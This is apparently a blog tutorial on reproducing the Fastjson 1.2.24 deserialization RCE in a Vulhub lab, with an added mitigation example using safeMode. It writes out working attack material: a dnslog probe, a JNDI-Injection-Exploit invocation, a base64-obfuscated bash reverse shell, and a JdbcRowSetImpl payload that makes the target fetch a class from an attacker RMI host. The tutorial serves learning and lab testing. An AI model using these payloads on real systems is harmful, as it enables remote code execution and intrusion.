JAVA security: Fastjson deserialization vulnerability, principle and reproduction

Table of Contents

Preface

Test environment preparation

dnslog test

Build rmi server & prepare malicious class

JdbcRowSetImpl attack

Reverse shell & command execution

Summary


Keywords: fastjson 1.2.24 deserialization leads to arbitrary command execution vulnerability

Note: This penetration test is all conducted in a virtual machine and is only for learning and communication. Please do not attack other people’s servers on the actual network.

Preface

The original requirement was only to parse string parameters into JSON data, but the JSON library was not satisfied with that (many packages offer this feature, and it is a convenient one) and also supports parsing strings directly into JavaBeans; while a string is being turned into a JavaBean, some of the bean's internal get/set methods may be called. In addition, the Fastjson library can infer the concrete type of an object from the @type key and so convert a JSON string into a Java object of that type.

Example:

    import com.alibaba.fastjson.JSON;
    import com.alibaba.fastjson.JSONObject;

    // "@type" tells Fastjson which class to instantiate (json.Student here)
    String jsonString = "{\"@type\":\"json.Student\",\"age\":5,\"name\":\"Tom\",\"telephone\":\"123456\"}";
    JSONObject jsonObject = JSON.parseObject(jsonString);
    System.out.println(jsonObject);
    System.out.println(jsonObject.getClass());

Output (screenshot):

However, in actual testing I found that different Java classes are handled differently by the Fastjson library. Take the java.net.Inet4Address class as an example: with {"a":{"@type":"java.net.Inet4Address","val":"xxx.dnslog.cn"}}, Fastjson will eventually call the getByName method of the java.net.Inet4Address class, and the host passed in is the dnslog address from val.

Since an arbitrary class can be specified for instantiation, some of its internal get/set methods are called, and their parameters are controlled by the caller, this can lead to security problems.
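An added example, not from the original post, that makes the mechanism above concrete: a harmless stand-in for the Student bean shows the parser instantiating whatever class @type names and running its setter with caller-supplied input, and then the same document is rejected once Fastjson's safeMode is switched on. It assumes fastjson 1.2.68 or later on the classpath (safeMode does not exist in the vulnerable 1.2.24); the class and field names are hypothetical.

```java
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONException;
import com.alibaba.fastjson.parser.ParserConfig;

public class AutoTypeDemo {

    // Hypothetical stand-in for the json.Student bean: no side effect beyond a log line.
    public static class Student {
        private String name;
        public String getName() { return name; }
        // Fastjson invokes this setter while building the bean from the JSON document.
        public void setName(String name) {
            System.out.println("setName() called by the parser with: " + name);
            this.name = name;
        }
    }

    public static void main(String[] args) {
        // The document chooses the class to instantiate via "@type" (attacker-controlled in a real app).
        String json = "{\"@type\":\"AutoTypeDemo$Student\",\"name\":\"Tom\"}";

        // 1) Open autoType, as 1.2.24 had by default. Newer versions keep a deny-list,
        //    but a class such as Student is not on it, so it is loaded and its setter runs.
        ParserConfig config = ParserConfig.getGlobalInstance();
        config.setAutoTypeSupport(true);
        Object obj = JSON.parse(json);
        System.out.println("instantiated: " + obj.getClass().getName());

        // 2) Mitigation: safeMode switches autoType off completely; the same document is
        //    rejected before any class named in "@type" is loaded.
        config.setSafeMode(true);
        try {
            JSON.parse(json);
            System.out.println("not rejected (unexpected)");
        } catch (JSONException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

Compile and run with the fastjson jar on the classpath; the first parse prints the setter log line, the second prints the safeMode rejection.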

This test exploits the Fastjson deserialization vulnerability to make the target host execute a command that spawns a reverse shell.


Test environment preparation

This time the container platform Vulhub is used. In the Ubuntu virtual machine, go to the vulhub/fastjson/1.2.24-rce directory and run the following command to start the vulnerable container: docker-compose up -d

Visit the site (screenshot).

dnslog test

The service accepts its data via POST. Create a dnslog subdomain and prepare the payload:

dnslog: {"a":{"@type":"java.net.Inet4Address","val":"xxx.dnslog.cn"}}

Content-Type: application/json // note that this header must be included

Reference request:

POST / HTTP/1.1
Host: 192.168.218.134:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 77

{"a":{"@type":"java.net.Inet4Address","val":"f6ac1ab5b7.ipv6.1433.eu.org.."}}

Build rmi server & prepare malicious class

1. This time the JNDI-Injection-Exploit tool is used to carry out the attack directly. (Download address: I found it online as well.)

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "xxxxxxxxxxxxxxxxxxxxxxxxxx" -A "192.168.218.1"

-C specifies the command the target host will execute, and -A specifies the local IP address to listen on.

2. Prepare the reverse shell command to be executed

bash -i >& /dev/tcp/<ip>/<port> 0>&1

However, in the actual test this command never succeeded and could not spawn the reverse shell. My guess is that some characters were transcoded in transit.

Solution: base64-decode the command and execute it in bash. Put the base64 encoding of the command bash -i >& /dev/tcp/192.168.218.1/4444 0>&1 in the following position:

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxOC4xLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}

Pass this command to the -C option of the JNDI-Injection-Exploit tool to generate the rmi server.

3. Use nc to listen on port 4444 on the local machine and wait for the reverse shell connection.

JdbcRowSetImpl attack

Put the address of the generated rmi service into the dataSourceName value of the payload:

POST / HTTP/1.1
Host: 192.168.218.134:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 77

{
    "a":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.218.1:1099/nc78zv",
        "autoCommit":true
    }
}

Send the request and observe the output of the JNDI-Injection-Exploit tool (screenshot).

As expected, when the server looks up the rmi service, the rmi server returns a reference to a malicious class at a network path. The server then requests that path to download the class and attempts to instantiate it. The tool logs a request to http:……

Reverse shell & command execution

Now check whether our nc listener has received the reverse shell (screenshot).

Check whether commands can be executed (screenshot).

Summary

Please give this a follow; the article is entirely hand-written.
